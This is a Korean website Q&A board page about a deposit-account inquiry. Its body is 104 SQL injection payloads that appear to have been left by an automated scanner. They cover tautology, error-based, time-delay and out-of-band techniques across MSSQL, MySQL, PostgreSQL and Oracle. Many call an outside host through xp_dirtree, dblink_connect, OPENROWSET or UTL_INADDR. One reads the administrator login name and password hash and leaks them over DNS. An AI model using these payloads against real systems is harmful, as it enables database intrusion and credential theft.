QnA

입금계좌문의

입금계좌문의



      관리자의 답변이 있습니다.


  1. -1 OR 1=1

  2. -1 OR 1=1

  3. -1 OR 1=1

  4. -1 OR 1=1

  5. NS-1NO

  6. -1 AND 'NS='ss

  7. -1' OR 1=1 OR 'ns'='ns

  8. -1" OR 1=1 OR "ns"="ns

  9. -1 OR 17-7=10

  10. -1 OR X='ss

  11. -1' OR 1=1 OR '1'='1

  12. -1' OR 1=1 OR '1'='1

  13. -1" OR 1=1 OR "1"="1

  14. -1" OR 1=1 OR "1"="1

  15. exec('xp_dirtree ''\1pl5f8p-nxtsmvfetxmwwelpkxumdi3c7iqwhxv_'+'czm.r87.me'+'c$a''')

  16. exec('xp_dirtree ''\1pl5f8p-nxjzsabi9fvlcu_xyqykdw1lmdzptd4y'+'i7s.r87.me'+'c$a''')

  17. declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.1pl5f8p-nxxvsffv2fag0058ettvjbeuoi2yjzdd'+'4a8.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\'+@h+'c$''')

  18. 1;exec('xp_dirtree ''\1pl5f8p-nxccsxrmdc0cpikix4wpk3vky22mpv-u'+'pbs.r87.me'+'c$a''')--

  19. 1;exec('xp_dirtree ''\1pl5f8p-nxo15g6nycqwnlubjo43iide-i-zgsrf'+'afi.r87.me'+'c$a''')--

  20. (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)

  21. -1';exec('xp_dirtree ''\1pl5f8p-nxzic4wbtqnug__ochqrp3nlkdaw-gc-'+'sac.r87.me'+'c$a''')--

  22. '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'

  23. -1';exec('xp_dirtree ''\1pl5f8p-nxz7w32ps5ocj0shfa7afq9evifgcro-'+'fvy.r87.me'+'c$a''')--

  24. convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))

  25. 1) exec('xp_dirtree ''\1pl5f8p-nxyq3eeonl4k_ylmm_kqyfellfhnmjcg'+'itm.r87.me'+'c$a''')--

  26. 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='

  27. -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

  28. 1) exec('xp_dirtree ''\1pl5f8p-nxsiqnljtyzkxkd4ex7ciwjvd1o7ocqv'+'_14.r87.me'+'c$a''')--

  29. -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

  30. -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"

  31. 1')exec('xp_dirtree ''\1pl5f8p-nxbdl7cndwsvfvfd-ape4g8diwzvrxyw'+'wxy.r87.me'+'c$a''')--

  32. 1')exec('xp_dirtree ''\1pl5f8p-nxdr3dopoche4w_rcdgubakt9k_usrqw'+'ai0.r87.me'+'c$a''')--

  33. (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))

  34. 1))exec('xp_dirtree ''\1pl5f8p-nxfytptgtdcheykhw32wfshi8jtwz_pc'+'zqk.r87.me'+'c$a''')--

  35. cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)

  36. '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'

  37. 1))exec('xp_dirtree ''\1pl5f8p-nxnlg7gfo7rwtyeptmy8ljrbly6pcllm'+'m4w.r87.me'+'c$a''')--

  38. (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)

  39. 1'))exec('xp_dirtree ''\1pl5f8p-nxkafzlijvhj6bmtrtn9rtximkzu_hyz'+'daa.r87.me'+'c$a''')--

  40. NSFTW

  41. 1'))exec('xp_dirtree ''\1pl5f8p-nxmtoelbe9bpj_l31h5lgkjxyskazsau'+'vbs.r87.me'+'c$a''')--

  42. syscolumns WHERE 2>3;exec('xp_dirtree ''\1pl5f8p-nxiue9kpm_u56-e4vrd75if1lr4puz4l'+'ory.r87.me'+'c$a''')--

  43. '+NSFTW+'

  44. syscolumns WHERE 2>3;exec('xp_dirtree ''\1pl5f8p-nxaa6hjtpkqxeluxjvyg7x_2sazocv2z'+'zse.r87.me'+'c$a''')--

  45. (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

  46. DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','1pl5f8p-nxpriwcygvlmihy10kc2mngzjghbdijf'+'uke.r87.me')exec sp_executesql @r

  47. -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

  48. 1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','1pl5f8p-nxahhsndxddeu_8m8egqgm_lcbfxkmh-'+'n5e.r87.me')exec sp_executesql @r--

  49. -1'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1

  50. -1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','1pl5f8p-nx14dlsf3z3k4pkjdmjiirwoc_rodkld'+'dae.r87.me')exec sp_executesql @r--

  51. 1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1

  52. SELECT dblink_connect('host=1pl5f8p-nxih8cjp-lvasn434ts0hztux_ehzags'||'u8w.r87.me user=a password=a connect_timeout=2')

  53. (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))

  54. SELECT dblink_connect('host=1pl5f8p-nxlf31cjdohtyc2cu3inyhhgjqdhahlt'||'2qk.r87.me user=a password=a connect_timeout=2')

  55. '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'

  56. dblink_connect('host=1pl5f8p-nxfwbarvvpff59dden7lqo6rpuzsgrn8'||'vou.r87.me user=a password=a connect_timeout=2')

  57. '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'

  58. dblink_connect('host=1pl5f8p-nx0iffbbetpheckzlb-ys5bhx4ylo4wl'||'v6e.r87.me user=a password=a connect_timeout=2')

  59. -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

  60. cast((SELECT dblink_connect('host=1pl5f8p-nxu6ubimsubr3qmcrhmd9ah2b4k-6yb6'||'ij0.r87.me user=a password=a connect_timeout=2')) as numeric)

  61. -1'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1

  62. cast((SELECT dblink_connect('host=1pl5f8p-nxmzuxnsgwp_kshnielyziblpbt_46d4'||'gsg.r87.me user=a password=a connect_timeout=2')) as numeric)

  63. cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(49)||chr(112)||chr(108)||chr(53)||chr(102)||chr(56)||chr(112)||chr(45)||chr(110)||chr(120)||chr(100)||chr(102)||chr(112)||chr(97)||chr(99)||chr(103)||chr(120)||chr(48)||chr(52)||chr(95)||chr(57)||chr(108)||chr(111)||chr(118)||chr(116)||chr(45)||chr(109)||chr(120)||chr(112)||chr(101)||chr(108)||chr(95)||chr(122)||chr(51)||chr(118)||chr(56)||chr(116)||chr(118)||chr(50)||chr(107)||chr(105)||chr(106)||chr(97)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric)

  64. '||(SELECT dblink_connect('host=1pl5f8p-nxbgajsayz6sjzphv4r__gxdrqfntzt3'||'vnq.r87.me user=a password=a connect_timeout=2'))||'

  65. '||(SELECT dblink_connect('host=1pl5f8p-nx4xfa2is3olkw-hgz4-7sjwuw7fd7lt'||'elq.r87.me user=a password=a connect_timeout=2'))||'

  66. (select UTL_INADDR.GET_HOST_ADDRESS('1pl5f8p-nxhrvdj-lxsixllfy1fw7mtcw1tvp2y-'||'izw.r87.me') from DUAL)

  67. (select UTL_INADDR.GET_HOST_ADDRESS('1pl5f8p-nxzimwf7_xwfne2tt-xmbbxd7qwqradv'||'ggc.r87.me') from DUAL)

  68. (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('1pl5f8p-nx5yhfbmpojlpfh_yxzekywq4orjlgqs'||'hhs.r87.me') from DUAL))))

  69. (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('1pl5f8p-nxbyrjr1zo3-nbwfhsbn7stffr9ibgxy'||'jlk.r87.me') from DUAL))))

  70. '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('1pl5f8p-nxwrk1q5njimh1xv5rcmtnjs_wj45tou'||'whg.r87.me') from DUAL))||'

  71. '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('1pl5f8p-nxjhyzhiyff9hhlcfugfycoozdjaomyg'||'fra.r87.me') from DUAL))||'

  72. (select UTL_INADDR.GET_HOST_ADDRESS(chr(49)||chr(112)||chr(108)||chr(53)||chr(102)||chr(56)||chr(112)||chr(45)||chr(110)||chr(120)||chr(100)||chr(105)||chr(115)||chr(52)||chr(114)||chr(113)||chr(109)||chr(104)||chr(48)||chr(102)||chr(102)||chr(114)||chr(51)||chr(103)||chr(105)||chr(117)||chr(104)||chr(110)||chr(49)||chr(104)||chr(113)||chr(98)||chr(51)||chr(122)||chr(107)||chr(103)||chr(102)||chr(112)||chr(114)||chr(109)||chr(48)||chr(98)||chr(101)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)

  73. (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(49)||chr(112)||chr(108)||chr(53)||chr(102)||chr(56)||chr(112)||chr(45)||chr(110)||chr(120)||chr(56)||chr(57)||chr(106)||chr(115)||chr(108)||chr(107)||chr(97)||chr(117)||chr(109)||chr(109)||chr(104)||chr(115)||chr(103)||chr(100)||chr(113)||chr(48)||chr(121)||chr(122)||chr(119)||chr(113)||chr(105)||chr(122)||chr(48)||chr(101)||chr(110)||chr(114)||chr(102)||chr(99)||chr(54)||chr(49)||chr(51)||chr(55)||chr(119)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))))

  74. '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(49)||chr(112)||chr(108)||chr(53)||chr(102)||chr(56)||chr(112)||chr(45)||chr(110)||chr(120)||chr(119)||chr(102)||chr(109)||chr(111)||chr(52)||chr(103)||chr(121)||chr(99)||chr(114)||chr(95)||chr(104)||chr(119)||chr(116)||chr(118)||chr(105)||chr(51)||chr(118)||chr(110)||chr(114)||chr(117)||chr(109)||chr(100)||chr(109)||chr(120)||chr(56)||chr(98)||chr(114)||chr(106)||chr(45)||chr(57)||chr(50)||chr(109)||chr(56)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||'

  75. ' WAITFOR DELAY '0:0:25'--

  76. 1 WAITFOR DELAY '0:0:25'--

  77. WAITFOR DELAY '0:0:25'--

  78. 1) WAITFOR DELAY '0:0:25'--

  79. ') WAITFOR DELAY '0:0:25'--

  80. ')) WAITFOR DELAY '0:0:25'--

  81. 1)) WAITFOR DELAY '0:0:25'--

  82. 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

  83. 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

  84. 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

  85. syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

  86. 1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/

  87. -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1

  88. ((select sleep(25)))a-- 1

  89. (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)

  90. 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '

  91. 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1

  92. 1';SELECT pg_sleep(25)--

  93. 1;SELECT pg_sleep(25)--

  94. SELECT pg_sleep(25)--

  95. 1);SELECT pg_sleep(25)--

  96. 1');SELECT pg_sleep(25)--

  97. 1'));SELECT pg_sleep(25)--

  98. 1));SELECT pg_sleep(25)--

  99. ((SELECT(1)FROM(SELECT(SLEEP(25)))A))

  100. '+((SELECT 1 FROM (SELECT SLEEP(25))A))+'

  101. -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'

  102. -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))

  103. -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"

  104. ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1

궁금함이 남았나요? 추가질문하세요.